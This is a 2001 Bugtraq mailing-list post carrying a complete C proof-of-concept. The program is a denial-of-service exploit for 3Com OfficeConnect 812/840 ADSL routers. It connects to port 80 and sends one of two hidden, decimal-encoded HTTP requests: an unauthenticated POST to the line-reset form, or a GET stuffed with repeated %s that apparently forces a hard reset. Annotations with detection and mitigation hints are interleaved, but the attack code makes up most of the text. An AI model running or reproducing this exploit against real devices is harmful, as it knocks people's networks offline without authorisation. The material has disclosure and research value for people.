3Com OfficeConnect 812/840 Router DoS exploit code
Date: Fri, 21 Sep 2001 19:25:17 -0300
From: Bruno Ratnieks <sniffer@sniffer.net>
To: bugtraq@securityfocus.com
Subject: 3Com OfficeConnect 812/840 Router DoS exploit code
------=_NextPart_000_0049_01C142D3.2535CCA0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
// 3Com OfficeConnect 812/840 ADSL Router Denial of Service (maybe others)
// security is weak
// Written pour sniffer <sniffer@sniffer.net>
// Fri Sep 21 15:51:35 BRT 2001
// Viva Brazil!
Vulnerable versions (as reported):
3com OfficeConnect DSL Router 812 1.1.7
3com OfficeConnect DSL Router 840 1.1.7
.---. .---------- Bruno Lacerda Ratnieks,
/ \ __ / ------ Technical Comm Developer
/ / \( )/ ----- Openweb Consultoria e Desen.
////// ' \/ ` --- ╚╚-╩╩
//// / // : : --- email: bruno@sniffer.net
// / / /` '-- mobile: (51) 983-665-40
// //..\\ icq: 11111117
====UU====UU==== ╚╚-╩╩
'//||\\`
------=_NextPart_000_0049_01C142D3.2535CCA0
Content-Type: application/octet-stream;
name="adsl812-denial.c"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="adsl812-denial.c"
// 3Com OfficeConnect 812/840 ADSL Router Denial of Service (maybe =
others)=0A=
// Proof of concept, soft and hard reset, the security is weak=0A=
// Written pour sniffer <sniffer@sniffer.net> =0A=
// Fri Sep 21 15:51:35 BRT 2001=0A=
// Viva Brazil!=0A=
=0A=
#include <stdio.h>=0A=
#include <string.h>=0A=
#include <errno.h>=0A=
#include <stdlib.h>=0A=
#include <unistd.h>=0A=
#include <netdb.h>=0A=
#include <sys/types.h>=0A=
#include <sys/socket.h>=0A=
#include <arpa/inet.h>=0A=
#include <netinet/in.h>=0A=
=0A=
// Prints the tool banner and the expected command line to stderr:=0A=
// a mode argument (1 or 2) followed by the router host.=0A=
// __FILE__ fills the first %s, the binary parameter the second.=0A=
// Old-style (K&R) parameter declaration, kept as posted.=0A=
void =0A=
usage(binary)=0A=
char *binary;=0A=
{=0A=
fprintf(stderr,"3Com OfficeConnect 812 ADSL Router Denial of Service =
(%s)\nsniffer <sniffer@sniffer.net>\n\t%s <1 (soft) || 2 (hard)> <remote =
router>\n", __FILE__, binary);=0A=
}=0A=
// Entry point. Takes a mode (argv[1]) and a router host (argv[2]),=0A=
// opens one TCP connection to port 80 of that host and writes a=0A=
// single canned HTTP request selected by the mode.=0A=
// Defensive reading: both requests go to the device's web=0A=
// management service, so keeping that service unreachable from=0A=
// untrusted networks removes the exposure shown here. The post=0A=
// lists firmware 1.1.7 as affected; check the vendor for a fix.=0A=
int=0A=
main(argc, argv)=0A=
int argc;=0A=
char **argv;=0A=
{=0A=
int sockfd;=0A=
char senddata[1024];=0A=
// Mode 2 request, stored as decimal ASCII: an HTTP/1.0 GET whose=0A=
// path is /graphics/sml3com followed by a long run of %s.=0A=
// NOTE(review): the %s run suggests the device hands the request=0A=
// path to a printf-style formatter; the post does not confirm the=0A=
// root cause. Detection: alert on request URIs with repeated %s.=0A=
char hardreset_data[] =3D { =0A=
71,69,84,32,47,103,114,97,112,104,105,99,115,=0A=
47,115,109,108,51,99,111,109,37,115,37,115,37,=0A=
115,37,115,37,115,37,115,37,115,37,115,37,115,=0A=
37,115,37,115,37,115,37,115,37,115,37,115,37,=0A=
115,37,115,37,115,37,115,37,115,37,115,37,115,=0A=
37,115,37,115,37,115,37,115,37,115,37,115,37,=0A=
115,37,115,37,115,37,115,37,115,37,115,37,115,=0A=
37,115,37,115,37,115,37,115,37,115,37,115,37,=0A=
115,37,115,37,115,37,115,37,115,37,115,37,115,=0A=
37,115,37,115,37,115,37,115,37,115,37,115,37,=0A=
115,37,115,37,115,37,115,37,115,37,115,37,115,=0A=
37,115,37,115,37,115,37,115,32,72,84,84,80,=0A=
47,49,46,48,10,10,0 };=0A=
// Mode 1 request, stored as decimal ASCII: an HTTP/1.1 POST to=0A=
// /Forms/adsl_reset with a fixed Host header of 192.168.1.254,=0A=
// Connection: close, Content-Length: 19 and a form body that sets=0A=
// Submit to Reset%20Line. No Authorization header or cookie is=0A=
// included, so the form is presumably accepted without a login;=0A=
// confirm against the device before relying on that.=0A=
char softreset_data[] =3D {=0A=
80,79,83,84,32,47,70,111,114,109,115,47,97,=0A=
100,115,108,95,114,101,115,101,116,32,72,84,84,=0A=
80,47,49,46,49,10,72,111,115,116,58,32,49,=0A=
57,50,46,49,54,56,46,49,46,50,53,52,10,=0A=
67,111,110,110,101,99,116,105,111,110,58,32,99,=0A=
108,111,115,101,10,67,111,110,116,101,110,116,45,=0A=
76,101,110,103,116,104,58,32,49,57,10,10,83,=0A=
117,98,109,105,116,61,82,101,115,101,116,37,50,=0A=
48,76,105,110,101,10,10,0 };=0A=
struct hostent *he;=0A=
struct sockaddr_in their_addr;=0A=
=0A=
// Exactly two arguments are required; otherwise print usage.=0A=
if( argc !=3D 3 )=0A=
{=0A=
usage(argv[0]);=0A=
exit(0);=0A=
}=0A=
// atoi() yields 0 for non-numeric text, so this rejects 0 and=0A=
// values of 3 or more. Negative values are not rejected here.=0A=
if( atoi(argv[1]) >=3D 3 || atoi(argv[1]) =3D=3D 0 )=0A=
{=0A=
usage(argv[0]);=0A=
exit(0); =0A=
}=0A=
// Resolve the host argument; herror() reports a lookup failure.=0A=
if((he=3Dgethostbyname(argv[2])) =3D=3D NULL)=0A=
{=0A=
herror("gethostbyname");=0A=
exit(1);=0A=
}=0A=
=0A=
// Destination is always TCP port 80 at the first resolved address.=0A=
their_addr.sin_family =3D AF_INET;=0A=
their_addr.sin_port =3D htons(80);=0A=
their_addr.sin_addr =3D (*(struct in_addr *)he->h_addr);=0A=
bzero(&their_addr.sin_zero, 8);=0A=
=0A=
if ((sockfd=3Dsocket(AF_INET, SOCK_STREAM, 0)) =3D=3D -1) =0A=
{=0A=
perror("socket");=0A=
exit(1);=0A=
}=0A=
=0A=
if(connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct =
sockaddr)) =3D=3D -1) =0A=
{=0A=
perror("connect");=0A=
exit(1);=0A=
}=0A=
else=0A=
{=0A=
printf("connected\n");=0A=
}=0A=
// Select the canned request. strncpy is bounded by strlen(source),=0A=
// so no terminating NUL is copied and the remainder of senddata=0A=
// stays uninitialised.=0A=
if(atoi(argv[1]) =3D=3D 1)=0A=
strncpy(senddata, softreset_data, strlen(softreset_data));=0A=
else if(atoi(argv[1]) =3D=3D 2)=0A=
strncpy(senddata, hardreset_data, strlen(hardreset_data));=0A=
=0A=
// sizeof(senddata) is 1024, so the whole buffer is written, not=0A=
// only the request. Detection: the bytes after the request are=0A=
// leftover stack contents, padding the write to 1024 bytes.=0A=
// The success message only means send() did not return -1; the=0A=
// code never reads a reply or checks the device state.=0A=
if(send(sockfd, senddata, sizeof(senddata), 0) =3D=3D -1) =0A=
{=0A=
perror("send");=0A=
exit(1);=0A=
}=0A=
else=0A=
{=0A=
printf("evil data sent\n.. have a rice day\n");=0A=
}=0A=
=0A=
close(sockfd);=0A=
return(0); =0A=
}=0A=
------=_NextPart_000_0049_01C142D3.2535CCA0--